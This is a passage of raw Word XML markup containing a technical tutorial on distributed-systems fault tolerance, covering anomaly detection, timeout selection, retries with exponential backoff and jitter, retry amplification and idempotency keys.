    <w:p w14:paraId="0DC67EE8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Outputs: probability that node has failed (0.0 = definitely alive, 1.0 = definitely dead).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FF35E5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Threshold chosen based on acceptable false positive rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C33ABA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Monitoring and Anomaly Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B0D5AC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42021B19" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Symptom-based detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D67256" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  "Error rate increased from 0.1% to 5%" → something is wrong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EED286D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  "p99 latency went from 50ms to 2000ms" → degradation detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B34DFFA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  "Queue depth growing steadily" → consumer is failing/slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56812F65" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="35040AA9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Anomaly detection (ML-based):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7719CE7B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Learn normal patterns → alert on deviations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341343C3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  "CPU is 95% at 3 AM — normally it's 20% at this time" → anomalous.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621B6C13" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  "Disk write latency is 4x normal" → potential disk failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510E05BE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="29085D2A">
          <v:rect id="_x0000_i6348" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FF38FF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Fault Tolerance Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573A427C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Timeouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7115838F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6164F018" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>The most basic fault tolerance mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785BBF54" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="72C7E7F5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Without timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A9850" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Service A calls Service B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69522E12" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Service B hangs (deadlock, overloaded, network issue).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BE4FDE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Service A waits FOREVER → thread blocked → eventually A is overloaded too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700ABDA1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Cascade: A's callers also wait → failure propagates upstream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6719BC5A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="615BB411" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>With timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1617D52F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Service A calls Service B with 5-second timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5A19DB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Service B hangs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9EBFB9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  After 5 seconds: A gives up, returns error to caller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772DFBE3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  A's resources freed → can serve other requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2531F2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Cascade prevented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF9DBC5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Choosing timeout values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F70D9A6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575AA146" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Too short: Normal slow responses treated as failures (false timeouts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE9F0E4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Too long: Slow failure detection, threads blocked for a long time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCB3B57" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="0EB02A49" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Approach 1: Static (p99 latency × 2-3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1752F668" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  If normal p99 = 100ms → set timeout = 200-300ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C3BCFC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="4435FB25" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Approach 2: Adaptive (based on observed latency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F08DFC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Track rolling p99 → set timeout = rolling_p99 × 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5883EAB1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Adjusts to changing conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CF6297" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="4A060FF9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Approach 3: Deadline propagation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659FAA7B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Overall request budget: 500ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395C2785" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Service A takes 50ms, passes remaining 450ms deadline to Service B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F64F64E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Service B takes 100ms, passes remaining 350ms to Service C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F49D1C5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Every service knows how much time remains → can abort early if insufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E015EB0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259A63F9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFA1FB9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Transient failures can often be resolved by simply trying again:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9FD4FF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Network blip (packet lost, TCP reset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABB1DD8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Server overloaded momentarily (503 returned)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6774ADD3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Lock contention (temporary conflict)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023D6700" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - DNS resolution failure (cache expired, resolver hiccup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A51B55" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="4116456D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Basic retry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E724441" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  for attempt in range(max_retries):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B117C0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E90C0C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">          return service_call()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B800664" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      except TransientError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298228F5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">          if attempt == max_retries - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016A17F3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">              raise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2569B1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">          wait(delay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C548FC8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exponential backoff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331CC0DA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711F32D3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>def retry_with_backoff(func, max_retries=5, base_delay=0.1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EDBB5E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    for attempt in range(max_retries):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F39E296" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB65B60" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            return func()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DC4545" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        except TransientError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5A4847" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            if attempt == max_retries - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9387F6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                raise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D3BCBD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            delay = base_delay * (2 ** attempt)  # 0.1, 0.2, 0.4, 0.8, 1.6 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FC665D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            jitter = random.uniform(0, delay * 0.5)  # Prevent thundering herd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEFF777" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            time.sleep(delay + jitter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF58FD5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retry amplification (the danger):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9BC51B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E577C5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Service chain: A → B → C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0230AE0A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="20917792" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Without coordination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A4EFE4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  A retries 3 times on failure from B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D93ABC2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  B retries 3 times on failure from C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05311895" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4788BD35" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  If C is down: B sends 3 requests to C (retries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CF731E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  A sees B fail → retries 3 times → B sends 3 × 3 = 9 requests to C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28803013" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C10B23" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  3 layers deep: 3³ = 27 requests to the failing service!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D52D70" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  At scale: 1000 requests/sec × 27 = 27,000 requests/sec → overloads C further.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3CCE80" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="70CAA970" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D32816" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Retry only at one layer (usually the outermost).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B58F90" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Use retry budgets: "max 10% of requests can be retries."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64514A4C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Return non-retryable errors for permanent failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9C2E49" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Include "retry count" header → downstream services see the amplification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA876D9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Idempotency (making retries safe):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E40B84" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9AB8FF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Problem: If the request SUCCEEDED but the response was lost:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB7D3A6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Client doesn't know if it succeeded → retries → DUPLICATE operation!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003F45F3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166B2910" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Example: "Transfer $100" retried → $200 transferred!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2812FD9E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="7B985E15" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Solution: Idempotency keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E4D2F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Client generates unique ID per logical request.</w:t>
      </w:r>
    </w:p>
